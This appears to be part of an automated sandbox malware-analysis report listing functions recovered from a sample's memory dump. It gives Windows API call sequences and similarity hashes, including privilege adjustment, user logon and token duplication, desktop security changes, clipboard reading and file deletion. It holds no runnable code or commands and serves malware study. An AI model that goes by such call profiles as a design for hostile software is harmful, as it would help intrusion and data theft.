                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F03172A00115BFDB05EBA5EC46D9F77F8EF45710F005065F505BB361DA70A941C751
APIs
• RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00E5319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00E55031
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: d757900c52be2942d9467905d0175cc6a1155e6564f54fdca631f3adc1d517ca
• Instruction ID: 146695f7995bbc8654521fad7c7189eb40b8751f3f3cc20a634e97befde45e96
• Opcode Fuzzy Hash: d757900c52be2942d9467905d0175cc6a1155e6564f54fdca631f3adc1d517ca
• Instruction Fuzzy Hash: 8BF0B433511E20A7DB315E26DC11A5A3798AF807A1F156821FC04BB0E0DA60D80986E0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00E46A79,?,0000015D,?,?,?,?,00E485B0,000000FF,00000000,?,?), ref: 00E53BC5
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 20a4ad967ae8fdcc51df147cf7bf6bfc834eb99129b04c91fd43c7e1fbec0b8a
• Instruction ID: b0aa0a881b516a60e3bc3318e70593106a28402d0f5814b5420d36891ac182e3
• Opcode Fuzzy Hash: 20a4ad967ae8fdcc51df147cf7bf6bfc834eb99129b04c91fd43c7e1fbec0b8a
• Instruction Fuzzy Hash: D3E0ED22201620ABDAA12A77AC01B9B3A8CAF413E7F152D61EC04B60A1DB70DE0881E0
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0a09e67e5dd19dc5fb957720c5472511d339ceaffccbf119e564de5062d96eee
• Instruction ID: 7c889fc074adc1eaa22fc6bb765f2e8b5d5c82cc3d03d45dd595e8ecc776519a
• Opcode Fuzzy Hash: 0a09e67e5dd19dc5fb957720c5472511d339ceaffccbf119e564de5062d96eee
• Instruction Fuzzy Hash: 42F06D71105722CFCB349F64F8A0856BBF4BF143693249A7EE2D7A6610C7719844DF50
APIs
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 680bc15acd4a141d6b8f3cbac73bf36037708d929c9862da58027216eed5ec88
• Instruction ID: 3db2546f7c7c6ebd43503f6bac48e3fea88016f170732ef9d2f4d5b5bb97b37d
• Opcode Fuzzy Hash: 680bc15acd4a141d6b8f3cbac73bf36037708d929c9862da58027216eed5ec88
• Instruction Fuzzy Hash: 64F0E571708641AAE7305B6498097E1FBE8AB4031DF10A66ED5D9E2181D7B28494DB51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E23963
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E23A76
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00E60A84,?,?,00000000,?,00E60A84,00000000,0000000C), ref: 00E60737
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00E8D840), ref: 00E8EAB1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DC54: FindFirstFileW.KERNEL32(?,?), ref: 00E8DCCB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E8DD1B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E8DD2C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8DC54: FindClose.KERNEL32(00000000), ref: 00E8DD43
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E9666E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8205A
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E82087
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E82010: GetLastError.KERNEL32 ref: 00E82097
                                                                                                                                                                                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E81BD2
                                                                                                                                                                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E81BF4
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E81C05
                                                                                                                                                                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E81C1D
                                                                                                                                                                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 00E81C36
                                                                                                                                                                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00E81C40
                                                                                                                                                                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E81C5C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E81B48), ref: 00E81A20
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A0B: CloseHandle.KERNEL32(?,?,00E81B48), ref: 00E81A35
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                                    • String ID: $default$winsta0$j
                                                                                                                                                                                                                                                                                                    • API String ID: 22674027-2615587742
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E81A60
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A6C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A82
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E81A99
                                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E81518
                                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E8154C
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00E81563
                                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00E8159D
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E815B9
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00E815D0
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E815D8
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00E815DF
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E81600
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00E81607
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E81636
                                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E81658
                                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E8166A
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E81691
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E81698
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E816A1
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E816A8
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E816B1
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E816B8
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00E816C4
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00E816CB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: GetProcessHeap.KERNEL32(00000008,00E814FD,?,00000000,?,00E814FD,?), ref: 00E81AED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E814FD,?), ref: 00E81AF4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E81ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E814FD,?), ref: 00E81B03
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7cb4646169158c2e302f45c0f3178833eede5a04fb58160c30f664ff9d454aa8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5637a002bb4719b32ef47821f9ec3229c2786e6e4483d53e6bfdc3099e313029
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cb4646169158c2e302f45c0f3178833eede5a04fb58160c30f664ff9d454aa8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39715BB290420AAFDF10EFA5DC44FAEBBBDBF04354F084655E959B6190E7319906CBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00EBDCD0), ref: 00E9F586
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E9F594
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00E9F5A0
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00E9F5AC
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E9F5E4
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00E9F5EE
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E9F619
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00E9F626
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00E9F62E
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E9F63F
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E9F67F
                                                                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 00E9F695
                                                                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 00E9F6A1
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00E9F6B2
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E9F6D4
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E9F6F1
                                                                                                                                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E9F72F
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00E9F750
                                                                                                                                                                                                                                                                                                    • CountClipboardFormats.USER32 ref: 00E9F771
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00E9F7B6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f1244bd83701c63ed43b17d555a49ea44b6c497dfdffcd227bbf4d04015bd8e0
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4a2d90cb41bd55d5f2102046264931109a04237deaa90b4ed00b0305b6240ad9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1244bd83701c63ed43b17d555a49ea44b6c497dfdffcd227bbf4d04015bd8e0
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE619035208201AFD700EF25EC85F6AB7E4AF44708F14556DF456E72A2DB31ED49CB61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E97403
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E97457
                                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E97493
                                                                                                                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E974BA
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E974F7
                                                                                                                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E97524
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c46092592e5cc59246f4cb5bec85fa8bdec2eb6b80740f6f560ae351607b460
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0eb49c1c72fbd74adc37a036b722a0456c80b57801811c6101da8f6f83d6448a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c46092592e5cc59246f4cb5bec85fa8bdec2eb6b80740f6f560ae351607b460
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD19272508354AFC710EB64D845EAFB7ECAF88704F40191DF589E6292EB74DA48C762
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E9A0A8
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00E9A0E6
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00E9A100
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00E9A118
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E9A123
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00E9A13F
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E9A18F
